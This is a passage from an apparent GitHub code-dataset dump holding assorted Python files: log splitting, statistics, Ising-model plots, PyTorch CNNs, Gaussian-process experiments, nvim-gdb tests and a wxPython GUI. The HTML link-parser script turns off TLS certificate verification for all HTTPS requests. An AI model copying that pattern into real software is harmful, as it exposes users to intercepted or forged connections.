读取配置文件\nwith open(\"config_size.txt\", \"r\") as config_file:\n for line in config_file:\n # 解析配置项\n log_path, output_path, split_param = line.strip().split(',')\n\n log_name = os.path.splitext(os.path.basename(log_path))[0]\n size = float(split_param)\n split_log_by_size(log_path, output_path, size, log_name)\n","repo_name":"h5m2424/Python_Script","sub_path":"log_cutter/log_cutter_by_size.py","file_name":"log_cutter_by_size.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16989361261","text":"#!/usr/bin/python3\ndef median(unsortedNumList):\n numList = sorted(unsortedNumList)\n middle = len(numList) // 2\n if len(numList) % 2 != 0:\n medianValue = numList[middle]\n else:\n medianValue = (numList[middle-1] + numList[middle]) / 2\n return medianValue\n\nif __name__ == '__main__':\n print(median([4, 5, 5, 4]))\n","repo_name":"aclissold/Python","sub_path":"Codecademy/median.py","file_name":"median.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35955157723","text":"from numpy import *\nfrom scipy import *\nfrom matplotlib.pyplot import *\nimport time\nimport sys\n\n# Open the file for reading\ninfile = open(\"beta0to0p1_Nbetas50_mcsteps1000_bins100_IsingMC.txt\", \"r\")\n\n# The first line contains information about the system. We read that separately\nfirstline = infile.readline() # Reads the first line only\n\n# Number of spins, spin size, number of bins\nN, s, bins = firstline.split()\nN = int(N); s = float(s); bins = int(bins) # Tested, and this is done successfully\n\n# Getting lists ready to store the data\nbetas = [] # List of beta values\nm_avs = [] # Average m over all bins and mcsteps, listed according to beta value\nsigma_msqs = [] # sigma_m**2: variance/bins + covariance\nvariances = [] # Variances\ncovs = [] # Covariance terms\nactimes = [] # Autocorrelation times\n\n# Read the rest of the lines\nlines = infile.readlines() # This works, I have checked it\n\n# Getting data from the file\nfor line in lines:\n words = line.split()\n if len(words) != 0:\n # Betas\n beta = float(words[0])\n betas.append(beta)\n # m_avs\n m_av = float(words[1])\n m_avs.append(m_av)\n # sigma_msq\n sigma_msq = float(words[2])\n sigma_msqs.append(sigma_msq)\n # variances\n var = float(words[3])\n variances.append(var)\n # covs\n cov = float(words[4])\n covs.append(cov)\n # actimes\n act = float(words[5])\n actimes.append(act)\n \n \n# We prefer arrays\nbetas = array(betas)\nm_avs = array(m_avs)\nsigma_msqs = array(sigma_msqs)\nvariances = array(variances)\ncovs = array(covs)\nactimes = array(actimes)\n\n# Remember to close the file\ninfile.close()\n\n# Doing the plotting thing\nfigure()\nplot(betas, m_avs, 'r')\ntitle('Average squared magnetization vs temperature in the Ising model')\nxlabel(r'$\\beta$')\nylabel(r'$^2$')\nshow()\n\nfigure()\nplot(betas, m_avs/(s*s), 'r') # Normalizing the spin \ntitle('Average squared magnetization vs temperature in the Ising model, with s=1')\nxlabel(r'$\\beta$')\nylabel(r'$^2$')\nshow()\n\nfigure()\nplot(betas, sigma_msqs, 'r')\ntitle(r'Total variance $\\sigma^2_m$ of $^2$ vs temperature in the Ising model')\nxlabel(r'$\\beta$')\nylabel(r'$\\sigma_m$')\nshow()\n\nfigure()\nplot(betas, variances, 'r')\ntitle(r'Variance $\\sigma^2$ of $^2$ in the Ising model')\nxlabel(r'$\\beta$')\nylabel(r'$\\sigma$')\nshow()\n\nfigure()\nplot(betas, covs, 'r')\ntitle(r'Covariance of $^2$ in the Ising model')\nxlabel(r'$\\beta$')\nylabel('Covariance')\nshow()\n\nfigure()\nplot(betas, actimes, 'r')\ntitle(r'Autocorrelation time $\\tau$ of $^2$ in the Ising model')\nxlabel(r'$\\beta$')\nylabel(r'$\\tau$')\nshow()\n\n\n","repo_name":"KineOdegardHanssen/ising2d_metropolis","sub_path":"plot_Ising2DMetropolis.py","file_name":"plot_Ising2DMetropolis.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36784514381","text":"\r\ninputnum = 0\r\n\r\nwhile inputnum != -1:\r\n inputnum = input(\"Please enter the required value (-1 to quit): \")\r\n thelist = list( int(x) for x in str(inputnum))\r\n icount = len(thelist)-1\r\n\r\n #numdigit = len(thelist)-1\r\n #inter = numdigit\r\n while icount > 0:\r\n if thelist[icount-1] > thelist[icount]:\r\n thelist[icount-1] = thelist[icount]\r\n i = icount\r\n while i <= (len(thelist)-1):\r\n thelist[i] = 9\r\n i +=1\r\n icount -= 1\r\n res_string = \"\".join(str(e) for e in thelist)\r\n print(int(res_string))","repo_name":"StefanOosAust/InterviewQ","sub_path":"part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73151669978","text":"from core.commands_templates import CommandTemplate\nfrom dsmodule.subjects import UserSubject\n\nclass Command(CommandTemplate):\n\n def execute_command(self):\n \n user_subject = UserSubject()\n subject_names = user_subject.get_subjects_names()\n\n print(\"--- Start of the list ---\")\n\n for subject_id, subject_name in enumerate(subject_names, start = 1):\n print(f\"ID: {subject_id} Name: {subject_name}\")\n \n print(\"--- End of the list ---\")\n","repo_name":"dgop92/utils3","sub_path":"dsmodule/commands/ls.py","file_name":"ls.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28422340026","text":"import pandas as pd\nimport json\nimport sys\n\nwith open(sys.argv[1], 'r+') as f:\n \tcontent = f.read()\n \tf.seek(0, 0)\n \tf.write(\"{\\n\\t\\\"data\\\": \" + content + \"\\n}\")\nwith open(sys.argv[1], \"r\") as f:\n raw = json.load(f)\n for i in range(len(raw[\"data\"])):\n for j in range(4):\n raw[\"data\"][i][\"paragraph_\" + str(j)] = raw[\"data\"][i][\"paragraphs\"][j]\n if sys.argv[1] == \"train.json\" or sys.argv[1] == \"valid.json\":\n if raw[\"data\"][i][\"paragraphs\"][j] == raw[\"data\"][i][\"relevant\"]:\n raw[\"data\"][i][\"label\"] = j\n del(raw[\"data\"][i][\"paragraphs\"])\n if sys.argv[1] == \"train.json\" or sys.argv[1] == \"valid.json\":\n del(raw[\"data\"][i][\"answer\"])\nwith open(sys.argv[2], \"w\") as f:\n json.dump(raw, f, indent=2, ensure_ascii=False)\n\n\n\n\n","repo_name":"akairisu/CSIE5431-2022-Spring-ADL-HW2","sub_path":"preprocess_context.py","file_name":"preprocess_context.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"28481259152","text":"import torch\n\nclass SimpleCNN(torch.nn.Module):\n def __init__(self, n_in_channels: int = 1, n_hidden_layers: int = 3, n_kernels: int = 32, kernel_size: int = 7):\n \"\"\"Simple CNN with `n_hidden_layers`, `n_kernels`, and `kernel_size` as hyperparameters\"\"\"\n super(SimpleCNN, self).__init__()\n \n cnn = []\n for i in range(n_hidden_layers):\n cnn.append(torch.nn.Conv2d(in_channels=n_in_channels, out_channels=n_kernels, kernel_size=kernel_size,\n bias=True, padding=int(kernel_size/2)))\n cnn.append(torch.nn.ReLU())\n n_in_channels = n_kernels\n self.hidden_layers = torch.nn.Sequential(*cnn)\n self.output_layer = torch.nn.Conv2d(in_channels=n_in_channels, out_channels=1,\n kernel_size=kernel_size, bias=True, padding=int(kernel_size/2))\n self.final_layer = torch.nn.Conv2d(in_channels=1, out_channels=1, kernel_size=3, bias=True, padding=int(3/2) )\n def forward(self, x):\n \"\"\"Apply CNN to input `x` of shape (N, n_channels, X, Y), where N=n_samples and X, Y are spatial dimensions\"\"\"\n cnn_out = self.hidden_layers(x) # apply hidden layers (N, n_in_channels, X, Y) -> (N, n_kernels, X, Y)\n pred = self.output_layer(cnn_out) # apply output layer (N, n_kernels, X, Y) -> (N, 1, X, Y)\n pred = self.final_layer(pred)\n \n #target_mask = torch.squeeze(x)[1].to(dtype=torch.bool)\n #pred = torch.squeeze(pred)[target_mask]\n\n return pred\n\nclass ComplexCNN(torch.nn.Module):\n def __init__(self):\n super(ComplexCNN, self).__init__()\n\n self.coarseCnn = SimpleCNN(n_in_channels=4, kernel_size=15)\n self.fineCnn = SimpleCNN(n_in_channels=4, kernel_size=3)\n\n self.outputCnn = SimpleCNN(n_in_channels=6)\n\n def forward(self, x):\n coarseOutput = self.coarseCnn(x)\n fineOutput = self.fineCnn(x)\n\n x = torch.cat((torch.unsqueeze(x[:,0,:,:],1),torch.unsqueeze(x[:,1,:,:],1),torch.unsqueeze(x[:,2,:,:],1),torch.unsqueeze(x[:,3,:,:],1), coarseOutput, fineOutput))\n x = x.permute(1,0,2,3)\n\n return self.outputCnn(x)\n","repo_name":"FritzMichael/ImageCropProject","sub_path":"architectures.py","file_name":"architectures.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"372370406","text":"#!/usr/bin/env python\nimport ssl\nfrom html.parser import HTMLParser\nfrom urllib.request import Request, urlopen\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nclass Parser(HTMLParser):\n tags = []\n\n def error(self, message):\n pass\n\n def handle_starttag(self, tag, attrs):\n\n self.tags.append(tag)\n\n if tag == 'enclosure':\n for attr, value in attrs:\n if attr == 'url' and value.startswith('http'):\n print('url =', value)\n break\n\n def handle_data(self, data):\n data = data.strip()\n if data.strip() != \"\":\n tag = self.tags[-1]\n print(tag, ':', data)\n\n def handle_endtag(self, tag):\n self.tags.pop()\n\n\nparser = Parser()\n\nheaders = {\n 'Connection': 'keep-alive',\n 'User-Agent': 'Mozilla/5.0',\n 'Accept': 'image/jpg,image/*,*/*',\n 'Accept-Encoding': 'gzip,deflate,br',\n 'Accept-Language': 'en-US,en'\n}\nurl = \"https://docs.python.org/3/library/urllib.html\"\nreq = Request(url, headers=headers)\nsite = urlopen(url)\nhtml = site.read()\n\nparser.feed(html.decode('utf-8'))\n","repo_name":"rjcostales/python","sub_path":"http/link_parser.py","file_name":"link_parser.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"27704155759","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %%\n# %load_ext autoreload\n# %autoreload 2\nget_ipython().run_line_magic(\"load_ext\", \"autoreload\")\nget_ipython().run_line_magic(\"autoreload\", \"2\")\nimport numpy as np\nimport jax\nimport jax.numpy as jnp\nimport jax.random as jr\nimport jax.scipy as jsp\nimport tensorflow_probability\nfrom tensorflow_probability.python.internal.backend import jax as tf2jax\n\ntfp = tensorflow_probability.experimental.substrates.jax\ntfk = tfp.math.psd_kernels\nimport optax\nimport matplotlib.pyplot as plt\nfrom IPython.display import set_matplotlib_formats\n\nset_matplotlib_formats(\"svg\")\nimport sys\n\nsys.path.insert(0, \"..\")\nfrom riemannianvectorgp.sparse_gp import SparseGaussianProcess\nfrom riemannianvectorgp.gp import GaussianProcess\nfrom riemannianvectorgp.kernel import (\n SquaredExponentialCompactRiemannianManifoldKernel,\n MaternCompactRiemannianManifoldKernel,\n ScaledKernel,\n EigenBasisFunctionState,\n TFPKernel,\n ManifoldProjectionVectorKernel,\n)\nfrom riemannianvectorgp.manifold import S1, EmbeddedS1\nfrom einops import rearrange\n\n\nfrom jax.config import config\n\n# config.update(\"jax_debug_nans\", True)\n# config.update(\"jax_disable_jit\", True)\n\n# %%\ndef plot(x, y, gp, params, state, samples=False):\n fig = plt.figure()\n # ax = fig.add_subplot(projection=\"polar\")\n ax = fig.add_subplot()\n\n state = gp.randomize(params, state, next(rng))\n\n K = gp.kernel.matrix(\n params.kernel_params, params.inducing_locations, params.inducing_locations\n )\n K = rearrange(K, \"M1 M2 OD1 OD2 -> (M1 OD1) (M2 OD2)\")\n\n M, OD = params.inducing_pseudo_log_err_stddev.shape\n Sigma = rearrange(\n jnp.exp(2 * params.inducing_pseudo_log_err_stddev), \"M OD -> (M OD)\"\n )\n Sigma = jnp.diag(Sigma)\n inducing_pseudo_mean = rearrange(params.inducing_pseudo_mean, \"M OD -> (M OD)\")\n\n inducing_mean = tf2jax.linalg.matvec(\n K + Sigma,\n inducing_pseudo_mean,\n )\n inducing_mean = rearrange(inducing_mean, \"(M OD) -> M OD\", M=M, OD=OD)\n f = gp(params, state, x)[:, :, 0]\n f_prior = gp.prior(params.kernel_params, state.prior_state, x)[:, :, 0]\n\n k = kernel.matrix(params.kernel_params, x, x)[0, :, 0]\n\n x = x[:, 0]\n y = y[:, 0]\n\n ax.scatter(x, y)\n\n m = jnp.mean(f, axis=0)\n u = jnp.quantile(f, 0.975, axis=0)\n l = jnp.quantile(f, 0.025, axis=0)\n\n ax.plot(x, m, linewidth=2)\n ax.fill_between(x, l, u, alpha=0.5)\n\n if samples:\n for i in range(f.shape[0]):\n ax.plot(x, f[i, :], color=\"gray\", alpha=0.5)\n\n ax.scatter(params.inducing_locations[:, 0], inducing_mean, zorder=6)\n ax.errorbar(\n params.inducing_locations[:, 0],\n inducing_mean[:, 0],\n yerr=jnp.exp(params.inducing_pseudo_log_err_stddev[:, 0]),\n linestyle=\"none\",\n zorder=5,\n )\n\n\ndef plot_gp(x, y, gp, params, state, samples=False):\n\n fig, axs = plt.subplots(3, 1, figsize=(4, 9))\n\n state = gp.randomize(params, state, next(rng))\n\n K = gp.kernel.matrix(\n params.kernel_params, params.inducing_locations, params.inducing_locations\n )\n K = rearrange(K, \"M1 M2 OD1 OD2 -> (M1 OD1) (M2 OD2)\")\n\n M, OD = params.inducing_pseudo_log_err_stddev.shape\n Sigma = rearrange(\n jnp.exp(2 * params.inducing_pseudo_log_err_stddev), \"M OD -> (M OD)\"\n )\n Sigma = jnp.diag(Sigma)\n inducing_pseudo_mean = rearrange(params.inducing_pseudo_mean, \"M OD -> (M OD)\")\n\n inducing_mean = tf2jax.linalg.matvec(\n K + Sigma,\n inducing_pseudo_mean,\n )\n inducing_mean = rearrange(inducing_mean, \"(M OD) -> M OD\", M=M, OD=OD)\n f = gp(params, state, x)[:, :, 0]\n f_prior = gp.prior(params.kernel_params, state.prior_state, x)[:, :, 0]\n\n k = kernel.matrix(params.kernel_params, x, x)[0, :, 0]\n\n x = x[:, 0]\n y = y[:, 0]\n\n axs[0].scatter(x, y)\n # ax.set_rmin-(-4)\n\n m = jnp.mean(f, axis=0)\n u = jnp.quantile(f, 0.975, axis=0)\n l = jnp.quantile(f, 0.025, axis=0)\n\n axs[0].plot(x, m, linewidth=2)\n axs[0].fill_between(x, l, u, alpha=0.5)\n\n if samples:\n for i in range(f.shape[0]):\n axs[0].plot(x, f[i, :], color=\"gray\", alpha=0.5)\n\n axs[0].scatter(params.inducing_locations[:, 0], inducing_mean, zorder=6)\n axs[0].errorbar(\n params.inducing_locations[:, 0],\n inducing_mean[:, 0],\n yerr=jnp.exp(params.inducing_pseudo_log_err_stddev[:, 0]),\n linestyle=\"none\",\n zorder=5,\n )\n axs[0].set_title(\"Sparse GP\")\n axs[1].plot(x, f_prior.T)\n axs[1].set_title(\"Prior samples\")\n axs[2].plot(x, k)\n axs[2].set_title(\"Kernel\")\n\n plt.tight_layout()\n\n\nclass GlobalRNG:\n def __init__(self, seed: int = np.random.randint(2147483647)):\n self.key = jax.random.PRNGKey(seed)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n (ret_key, self.key) = jr.split(self.key)\n return ret_key\n\n\n# %%\n\nrng = GlobalRNG()\n\n# %%\nx = jnp.expand_dims(jnp.linspace(0, jnp.pi * 2, 101), -1)\ny = 2 * jnp.sin(x) + jr.normal(next(rng), x.shape) / 10\n\n\n# %%\nkernel = ScaledKernel(TFPKernel(tfk.ExponentiatedQuadratic, 1, 1))\nkernel_params = kernel.init_params(next(rng))\nsub_kernel_params = kernel_params.sub_kernel_params\nsub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(jnp.array(0.5)))\nkernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\nkernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0])\n)\nk = kernel.matrix(kernel_params, x, x)\nplt.plot(x[:, 0], k[0, :, 0, 0], label=\"EQ - euclidean\")\n\ns1 = S1(0.5)\nkernel = ScaledKernel(SquaredExponentialCompactRiemannianManifoldKernel(s1, 100))\n# kernel = ScaledKernel(MaternCompactRiemannianManifoldKernel(4.5,s1, 100))\nkernel_params = kernel.init_params(next(rng))\nsub_kernel_params = kernel_params.sub_kernel_params\nsub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(0.15))\nkernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\nkernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0])\n)\nk = kernel.matrix(kernel_params, x, x)\nplt.plot(x[:, 0], k[0, :, 0, 0], label=\"EQ\")\nfor nu in [0.5, 1.5, 2.5, 3.5, 4.5]:\n kernel = ScaledKernel(MaternCompactRiemannianManifoldKernel(nu, s1, 100))\n kernel_params = kernel.init_params(next(rng))\n sub_kernel_params = kernel_params.sub_kernel_params\n sub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(0.15))\n kernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\n kernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0])\n )\n k = kernel.matrix(kernel_params, x, x)\n plt.plot(x[:, 0], k[0, :, 0, 0], label=f\"{nu}\")\nplt.legend()\nplt.title(f\"LS: {jnp.exp(kernel_params.sub_kernel_params.log_length_scale):0.3f}\")\n# %%\ns1 = S1(1.0)\nkernel = ScaledKernel(SquaredExponentialCompactRiemannianManifoldKernel(s1, 100))\n# kernel = ScaledKernel(MaternCompactRiemannianManifoldKernel(1.5, s1, 100))\nkernel_params = kernel.init_params(next(rng))\nsub_kernel_params = kernel_params.sub_kernel_params\nsub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(0.1))\nkernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\nkernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0])\n)\nk = kernel.matrix(kernel_params, x, x)\n\nprint(k.shape)\nplt.plot(x[:, 0], k[0, :, 0, 0], label=\"EQ\")\n# %%\ns1 = EmbeddedS1(1.0)\nkernel = ScaledKernel(\n ManifoldProjectionVectorKernel(\n # SquaredExponentialCompactRiemannianManifoldKernel(s1, 100)\n MaternCompactRiemannianManifoldKernel(0.5, s1, 100),\n s1,\n )\n)\nkernel_params = kernel.init_params(next(rng))\nsub_kernel_params = kernel_params.sub_kernel_params\nsub_kernel_params = sub_kernel_params._replace(log_length_scale=jnp.log(0.1))\nkernel_params = kernel_params._replace(sub_kernel_params=sub_kernel_params)\nkernel_params = kernel_params._replace(\n log_amplitude=-jnp.log(kernel.matrix(kernel_params, x, x)[0, 0, 0, 0])\n)\nk = kernel.matrix(kernel_params, x, x)\nprint(k.shape)\nplt.plot(x[:, 0], k[0, :, 0, 0], label=\"EQ\")\n# %%\nrng = GlobalRNG()\ngp = SparseGaussianProcess(kernel, 11, 67, 100)\n(params, state) = gp.init_params_with_state(next(rng))\nparams = params._replace(kernel_params=kernel_params)\n\n\n# %%\nparams\n\n\n# %%\nx_ind = jnp.expand_dims(jnp.linspace(0, 2 * jnp.pi, 11), -1)\ny_ind = 2 * jnp.sin(x_ind) + jr.normal(next(rng), x_ind.shape) / 10\ny_ind = jnp.zeros_like(x_ind)\n\nparams = gp.set_inducing_points(params, x_ind, y_ind, jnp.ones_like(y_ind) * 0.01)\n\n\n# %%\nstate = gp.resample_prior_basis(params, state, next(rng))\nstate = gp.randomize(params, state, next(rng))\n\n# %%\n\nplot_gp(x, y, gp, params, state, samples=True)\n\n# %%\nopt = optax.chain(optax.scale_by_adam(b1=0.9, b2=0.999, eps=1e-8), optax.scale(-0.01))\nopt_state = opt.init(params)\n\n# %%\ndebug_params = [params]\ndebug_states = [state]\ndebug_keys = [rng.key]\n\n# %%\nfor i in range(600):\n ((train_loss, state), grads) = jax.value_and_grad(gp.loss, has_aux=True)(\n params, state, next(rng), x, y, x.shape[0]\n )\n (updates, opt_state) = opt.update(grads, opt_state)\n params = optax.apply_updates(params, updates)\n if jnp.all(jnp.isnan(grads.kernel_params.sub_kernel_params.log_length_scale)):\n print(\"breaking for nan\")\n break\n if i <= 10 or i % 20 == 0:\n print(i, \"Loss:\", train_loss)\n debug_params.append(params)\n debug_states.append(state)\n debug_keys.append(rng.key)\n\n# %%\n\nplot_gp(x, y, gp, debug_params[-1], debug_states[-1], samples=True)\n\n# %%\njax.value_and_grad(gp.loss, has_aux=True)(\n debug_params[-1], debug_states[-1], debug_keys[-1], x, y, x.shape[0]\n)\n\n# %%\nconfig.update(\"jax_debug_nans\", True)\n\n# %%\njax.grad(gp.loss, has_aux=True)(\n debug_params[-1], debug_states[-1], debug_keys[-1], x, y, x.shape[0]\n)\n\n# %%\ndebug_params[-1]\n\n# %%\n\nplot_gp(x, y, gp, params, state, samples=False)\nprint(gp.loss(params, state, next(rng), x, y, x.shape[0])[0])\n# %%\n","repo_name":"MJHutchinson/ExtrinsicGaugeIndependentVectorGPs","sub_path":"examples/circle_sine.py","file_name":"circle_sine.py","file_ext":"py","file_size_in_byte":10208,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"68"} +{"seq_id":"15567357198","text":"'''Test keymaps configuration.'''\n\n# pylint: disable=redefined-outer-name\n\nimport pytest\n\n\ndef _launch(eng):\n eng.feed(\":GdbStart ./dummy-gdb.sh\\n\")\n\n\n@pytest.fixture(scope='function')\ndef keymap(eng, post):\n '''Fixture to clear custom keymaps.'''\n assert post\n yield True\n eng.exe('source keymap_cleanup.vim')\n\n\ndef test_hooks(eng, keymap):\n '''Test custom programmable keymaps.'''\n assert keymap\n eng.exe(\"source keymap_hooks.vim\")\n _launch(eng)\n\n assert eng.eval('g:test_tkeymap') == 0\n eng.feed('~tkm')\n assert eng.eval('g:test_tkeymap') == 1\n eng.feed('')\n assert eng.eval('g:test_keymap') == 0\n eng.feed('~tn')\n assert eng.eval('g:test_keymap') == 1\n eng.exe('let g:test_tkeymap = 0 | let g:test_keymap = 0')\n eng.feed('w')\n assert eng.eval('g:test_keymap') == 0\n eng.feed('~tn')\n assert eng.eval('g:test_keymap') == 1\n eng.exe('let g:test_keymap = 0')\n\n\ndef test_conflict(eng, keymap):\n '''Conflicting keymap.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_config = {'key_next': '', 'key_prev': ''}\")\n _launch(eng)\n\n count = eng.eval(\n 'len(filter(GdbTestPeekConfig(), {k,v -> k =~ \"^key_.*\"}))')\n assert count == 1\n # Check that the cursor is moving freely without stucking\n eng.feed('')\n eng.feed('w')\n eng.feed('w')\n\n\ndef test_override(eng, keymap):\n '''Override a key.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_config_override = {'key_next': ''}\")\n _launch(eng)\n key = eng.eval('get(GdbTestPeekConfig(), \"key_next\", 0)')\n assert key == ''\n\n\ndef test_override_priority(eng, keymap):\n '''Check that a config override assumes priority in a conflict.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_config_override = {'key_next': ''}\")\n _launch(eng)\n res = eng.eval('get(GdbTestPeekConfig(), \"key_breakpoint\", 0)')\n assert res == 0\n\n\ndef test_override_one(eng, keymap):\n '''Override a single key.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_key_next = ''\")\n _launch(eng)\n key = eng.eval('get(GdbTestPeekConfig(), \"key_next\", 0)')\n assert key == ''\n\n\ndef test_override_one_priority(eng, keymap):\n '''Override a single key, priority.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_key_next = ''\")\n _launch(eng)\n res = eng.eval('get(GdbTestPeekConfig(), \"key_breakpoint\", 0)')\n assert res == 0\n\n\ndef test_overall(eng, keymap):\n '''Smoke test.'''\n assert keymap\n eng.exe(\"let g:nvimgdb_config_override = {'key_next': ''}\")\n eng.exe(\"let g:nvimgdb_key_step = ''\")\n _launch(eng)\n res = eng.eval('get(GdbTestPeekConfig(), \"key_continue\", 0)')\n assert res == 0\n res = eng.eval('get(GdbTestPeekConfig(), \"key_next\", 0)')\n assert res == 0\n key = eng.eval('get(GdbTestPeekConfig(), \"key_step\", 0)')\n assert key == ''\n","repo_name":"SkyLeach/nvim-gdb","sub_path":"test/test_40_keymap.py","file_name":"test_40_keymap.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"30493675051","text":"import wx\nfrom wx.lib.wordwrap import wordwrap\n\nimport os\nfrom functools import partial\nfrom .dialogs import StatementCreationWizard, SettingsDialog\nfrom .dialogs import STATEMENT, REGISTRY\nfrom ..utils import pub, silent_remove, get_save_path_from_dialog\nfrom ..topics import *\nfrom ..constants import *\nfrom .HistoryViewer import HistoryViewer\nfrom .TransactionMaker import TransactionMaker\nfrom . import images\nfrom yapsy.PluginManager import PluginManagerSingleton\nfrom ..models import UserError\nfrom ... import about\nfrom .events import EVT_TRANSACTION_EDIT\n\nclass MenuItemToggleListener:\n def __init__(self, menuItem):\n self.menuItem = menuItem\n\n def __call__(self, enabled):\n self.menuItem.Enable(enabled)\n\nclass MainFrame(wx.Frame):\n def __init__(self, backend, parent, title=MAIN_FRAME_TITLE,\n style= wx.DEFAULT_FRAME_STYLE\n |wx.MAXIMIZE ):\n wx.Frame.__init__(self, parent, style=style, title=title)\n self.backend = backend\n self.setupMenuBar()\n self.statusbar = self.CreateStatusBar()\n self.history_viewer = HistoryViewer(backend, self)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.transaction_maker = TransactionMaker(backend, self)\n pub.subscribe(self.OnAddTransactionToggle, ADD_TRANSACTION)\n pub.subscribe(self.OnTransactionAdded, TRANSACTION_ADDED)\n sizer.Add(self.transaction_maker,1,wx.EXPAND)\n self.SetSizerAndFit(sizer)\n self.SetIcons(images.GetIconBundleFromImage(images.getAppIconImage()))\n\n self.Bind(EVT_TRANSACTION_EDIT, self.OnEditTransaction)\n\n def OnEditTransaction(self, evt):\n self.transaction_maker.FromTransaction(evt.transaction)\n\n def OnTransactionAdded(self, id):\n self.statusbar.PushStatusText('New transaction added with '\n 'transaction id {}'.format(id))\n def OnAddTransactionToggle(self,enabled):\n self.transaction_maker.Toggle(enabled)\n\n def menuData(self):\n return (('&File',\n (\n ('New Database', wx.ID_NEW, self.OnCreateDatabase, OPEN_DATABSE),\n ('Open Database',wx.ID_OPEN, self.OnOpenDatabase, OPEN_DATABSE),\n ('Exit', wx.ID_EXIT, self.OnExit)\n )\n ),\n ('&Database',\n (\n ('Initialize Database\\tCTRL+I', wx.NewId(), self.OnInitDatabase, INIT_DATABASE),\n ('Generate Statement\\tCTRL+S', wx.NewId(), self.OnGenerateStatement ,GENERATE_STATEMENT),\n (),\n ('View History \\tCTRL+H', wx.NewId(), self.OnViewHistory, GET_HISTORY)\n )\n ),\n ('Preferences',\n (\n ('Settings\\tCTRL+T', wx.NewId(), self.OnSettings ),\n )\n ),\n ('Help',\n (\n ('About',wx.ID_ABOUT,self.OnAbout),\n )\n )\n )\n\n def setupMenuBar(self):\n self.togglers = {}\n menubar = wx.MenuBar()\n for menuLabel, menuItems in self.menuData():\n menu = wx.Menu()\n for mi in menuItems:\n if len(mi) == 0:\n menu.AppendSeparator()\n continue\n item = menu.Append(mi[1], mi[0])\n self.Bind(wx.EVT_MENU, mi[2], id=mi[1])\n if len(mi) >= 4:\n self.togglers[item] = MenuItemToggleListener(item)\n pub.subscribe(self.togglers[item], mi[3])\n menubar.Append(menu, menuLabel)\n self.SetMenuBar(menubar)\n\n def OnAbout(self, evt):\n info = wx.AboutDialogInfo()\n for a in ('Name','Version','Copyright','WebSite','Developers'):\n setattr(info,a,getattr(about,a))\n\n for b,w in (('License',700),('Description',500)):\n setattr(info,b,wordwrap(getattr(about,b),w,\n wx.ClientDC(self)))\n wx.AboutBox(info)\n\n def OnExit(self, evt):\n self.Close()\n\n def OnSettings(self, evt):\n dlg = SettingsDialog(self)\n dlg.ShowModal()\n dlg.Destroy()\n\n def OnOpenDatabase(self, evt):\n dlg = wx.FileDialog(self, message=\"Open Database File ..\",\n wildcard=DB_FILE_WILD_CARD,\n style= wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)\n\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.OpenDatabase(path)\n\n dlg.Destroy()\n\n def OpenDatabase(self, path):\n self.backend.OpenDatabase(path)\n self.statusbar.PushStatusText('Opened database file \"{}\"'\\\n .format(path))\n self.SetTitle('{} :{}'.format(MAIN_FRAME_TITLE,path))\n\n \n def OnCreateDatabase(self, evt):\n dlg = wx.FileDialog(self, message=\"Create Database file..\",\n wildcard=DB_FILE_WILD_CARD,\n defaultFile=DEFAULT_DB_FILE_NAME,\n style=wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)\n\n path = get_save_path_from_dialog(dlg, DB_FILE_EXTENSION)\n\n dlg.Destroy()\n\n if path is None:\n return\n\n silent_remove(path)\n self.backend.OpenDatabase(path)\n\n self.statusbar.PushStatusText('Created new database file \"{}\"'\\\n .format(path))\n\n\n def OnInitDatabase(self, evt):\n dlg = wx.FileDialog(self, message=\"Open file to init database ..\",\n wildcard=INIT_FILE_WILD_CARD,\n style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)\n\n if dlg.ShowModal() == 